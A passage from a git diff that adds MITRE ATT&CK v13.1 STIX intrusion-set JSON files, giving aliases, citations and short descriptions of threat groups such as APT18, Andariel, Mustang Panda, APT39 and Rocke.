Team. (2014, August 20). El Machete. Retrieved September 13, 2019." + }, + { + "source_name": "ESET Machete July 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019." + }, + { + "source_name": "360 Machete Sep 2020", + "url": "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/", + "description": "kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries \u2014 HpReact campaign. Retrieved November 20, 2020." + } + ], + "modified": "2021-10-06T19:26:47.988Z", + "name": "Machete", + "description": "[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json new file mode 100644 index 0000000000000000000000000000000000000000..a53fedbc92a386c10231317ad5d2da90f0edd8cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--f21dc752-c30f-4e1d-8ee6-dc6a3880da7a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT18", + "TG-0416", + "Dynamite Panda", + "Threat Group-0416" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648", + "type": "intrusion-set", + "created": "2017-05-31T21:31:57.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0026", + "external_id": "G0026" + }, + { + "source_name": "APT18", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "TG-0416", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "Dynamite Panda", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "Threat Group-0416", + "description": "(Citation: ThreatStream Evasion Analysis)" + }, + { + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "source_name": "Dell Lateral Movement" + }, + { + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.", + "source_name": "ThreatStream Evasion Analysis" + }, + { + "source_name": "Anomali Evasive Maneuvers July 2015", + "url": "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018." + } + ], + "modified": "2020-03-30T18:46:16.853Z", + "name": "APT18", + "description": "[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json new file mode 100644 index 0000000000000000000000000000000000000000..ca75847756231ef94f7714d50fd8514390f10b0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--670740b9-2d8e-40cd-83b6-db0653b67aca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:51:40.270Z", + "name": "Andariel", + "description": "[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)\n\n[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "aliases": [ + "Andariel", + "Silent Chollima" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Kyoung-ju Kwak (S2W)" + ], + "type": "intrusion-set", + "id": "intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8", + "created": "2021-09-29T15:10:19.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0138", + "external_id": "G0138" + }, + { + "source_name": "Silent Chollima", + "description": "(Citation: CrowdStrike Silent Chollima Adversary September 2021)" + }, + { + "source_name": "Andariel", + "description": "(Citation: FSI Andariel Campaign Rifle July 2017)" + }, + { + "source_name": "AhnLab Andariel Subgroup of Lazarus June 2018", + "description": "AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.", + "url": "http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf" + }, + { + "source_name": "TrendMicro New Andariel Tactics July 2018", + "description": "Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html" + }, + { + "source_name": "CrowdStrike Silent Chollima Adversary September 2021", + "description": "CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.", + "url": "https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/" + }, + { + "source_name": "FSI Andariel Campaign Rifle July 2017", + "description": "FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do" + }, + { + "source_name": "IssueMakersLab Andariel GoldenAxe May 2017", + "description": "IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.", + "url": "http://www.issuemakerslab.com/research3/" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json new file mode 100644 index 0000000000000000000000000000000000000000..f90b09397ff06cde9a5f6c4f42c0e4e3de5da66b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--18b3f168-44f9-4dfc-9c4d-9a0fc79a8e88", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T13:21:41.276Z", + "name": "CURIUM", + "description": "[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)", + "aliases": [ + "CURIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a", + "created": "2023-01-13T20:51:13.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1012", + "external_id": "G1012" + }, + { + "source_name": "Microsoft Iranian Threat Actor Trends November 2021", + "description": "MSTIC. (2021, November 16). Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021. Retrieved January 12, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json new file mode 100644 index 0000000000000000000000000000000000000000..0a87fe99a6aaea57165540be2243508132104b6e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--c7bd8b1a-abd1-4784-8975-479ecf42cefc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:31:54.382Z", + "name": "Sidewinder", + "description": "[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)", + "aliases": [ + "Sidewinder", + "T-APT-04", + "Rattlesnake" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Lacework Labs", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e", + "created": "2021-01-27T15:57:11.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0121", + "external_id": "G0121" + }, + { + "source_name": "T-APT-04", + "description": "(Citation: Cyble Sidewinder September 2020)" + }, + { + "source_name": "Rattlesnake", + "description": "(Citation: Cyble Sidewinder September 2020)" + }, + { + "source_name": "Cyble Sidewinder September 2020", + "description": "Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.", + "url": "https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/" + }, + { + "source_name": "Securelist APT Trends April 2018", + "description": "Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.", + "url": "https://securelist.com/apt-trends-report-q1-2018/85280/" + }, + { + "source_name": "ATT Sidewinder January 2021", + "description": "Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.", + "url": "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json new file mode 100644 index 0000000000000000000000000000000000000000..42491816dc6bd26c31c85a916e9a2a26881ad8ad --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--728b7aa4-f413-42bf-91aa-f4e9c89fd2bc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T22:01:13.781Z", + "name": "Mustang Panda", + "description": "[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) ", + "aliases": [ + "Mustang Panda", + "TA416", + "RedDelta", + "BRONZE PRESIDENT" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4", + "created": "2021-04-12T15:56:28.861Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0129", + "external_id": "G0129" + }, + { + "source_name": "Mustang Panda", + "description": "(Citation: Crowdstrike MUSTANG PANDA June 2018)" + }, + { + "source_name": "TA416", + "description": "(Citation: Proofpoint TA416 November 2020)" + }, + { + "source_name": "RedDelta", + "description": "(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)" + }, + { + "source_name": "BRONZE PRESIDENT", + "description": "(Citation: Secureworks BRONZE PRESIDENT December 2019)" + }, + { + "source_name": "Anomali MUSTANG PANDA October 2019", + "description": "Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.", + "url": "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations" + }, + { + "source_name": "Secureworks BRONZE PRESIDENT December 2019", + "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.", + "url": "https://www.secureworks.com/research/bronze-president-targets-ngos" + }, + { + "source_name": "Recorded Future REDDELTA July 2020", + "description": "Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP \u2018REDDELTA\u2019 TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf" + }, + { + "source_name": "Crowdstrike MUSTANG PANDA June 2018", + "description": "Meyers, A. (2018, June 15). Meet CrowdStrike\u2019s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/" + }, + { + "source_name": "Proofpoint TA416 November 2020", + "description": "Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" + }, + { + "source_name": "Proofpoint TA416 Europe March 2022", + "description": "Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json new file mode 100644 index 0000000000000000000000000000000000000000..37ba47c4e9b591f82cc7f3bcc3d0a55d63f50ef4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--247c61a2-d347-4cd5-a27c-f482ab7af768", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T22:10:43.732Z", + "name": "ZIRCONIUM", + "description": "[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)", + "aliases": [ + "ZIRCONIUM", + "APT31" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "intrusion-set", + "id": "intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b", + "created": "2021-03-24T15:48:17.731Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0128", + "external_id": "G0128" + }, + { + "source_name": "APT31", + "description": "(Citation: Check Point APT31 February 2021)" + }, + { + "source_name": "Microsoft Targeting Elections September 2020", + "description": "Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.", + "url": "https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/" + }, + { + "source_name": "Check Point APT31 February 2021", + "description": "Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian \u2013 How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.", + "url": "https://research.checkpoint.com/2021/the-story-of-jian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json new file mode 100644 index 0000000000000000000000000000000000000000..56dadf470da5e4b03c16385d13d2730b104ef576 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--f2cd46f1-c0fa-4427-a17f-6ab7b989d077", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Rocke" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "type": "intrusion-set", + "created": "2020-05-26T14:20:20.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0106", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0106" + }, + { + "source_name": "Talos Rocke August 2018", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020." + } + ], + "modified": "2020-06-19T20:41:21.215Z", + "name": "Rocke", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json new file mode 100644 index 0000000000000000000000000000000000000000..194339fdb3e96e678b62112ab1bfe15a5e971a4f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--7a222a7e-f5f3-469e-b51e-928666bf3472", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-02T18:03:29.024Z", + "name": "APT39", + "description": "[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)", + "aliases": [ + "APT39", + "ITG07", + "Chafer", + "Remix Kitten" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "type": "intrusion-set", + "id": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80", + "created": "2019-02-19T16:01:38.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0087", + "external_id": "G0087" + }, + { + "source_name": "Remix Kitten", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "ITG07", + "description": "(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "APT39", + "description": "(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "Chafer", + "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "Dept. of Treasury Iran Sanctions September 2020", + "description": "Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.", + "url": "https://home.treasury.gov/news/press-releases/sm1127" + }, + { + "source_name": "DOJ Iran Indictments September 2020", + "description": "DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.", + "url": "https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt" + }, + { + "source_name": "FBI FLASH APT39 September 2020", + "description": "FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.", + "url": "https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf" + }, + { + "source_name": "FireEye APT39 Jan 2019", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + }, + { + "source_name": "Dark Reading APT39 JAN 2019", + "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.", + "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764" + }, + { + "source_name": "Symantec Chafer Dec 2015", + "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.", + "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json new file mode 100644 index 0000000000000000000000000000000000000000..763dfe9359b53301b7a534264f79d8570f82012e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--51e4d868-a26e-4a8f-a8e5-7b2363b674fb", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT37", + "Richochet Chollima", + "InkySquid", + "ScarCruft", + "Reaper", + "Group123", + "TEMP.Reaper" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c", + "type": "intrusion-set", + "created": 